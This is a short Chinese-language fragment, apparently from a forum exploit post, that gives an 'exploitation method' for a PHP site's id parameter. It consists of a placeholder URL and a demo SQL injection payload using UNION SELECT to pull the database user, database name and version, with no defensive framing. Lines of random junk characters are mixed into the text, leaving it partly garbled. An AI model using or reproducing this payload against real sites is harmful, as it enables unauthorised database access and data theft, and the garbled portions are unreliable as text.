利用方法:
9 I1 j! j. H) ?) W http://www.xxx.com/index.php?id=[SQL]
/ ^+ q% e+ j! r% s' R( |6 U2 ^0 |9 A Demo:
; ?1 M# X: i# [1 H1 i- [ http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |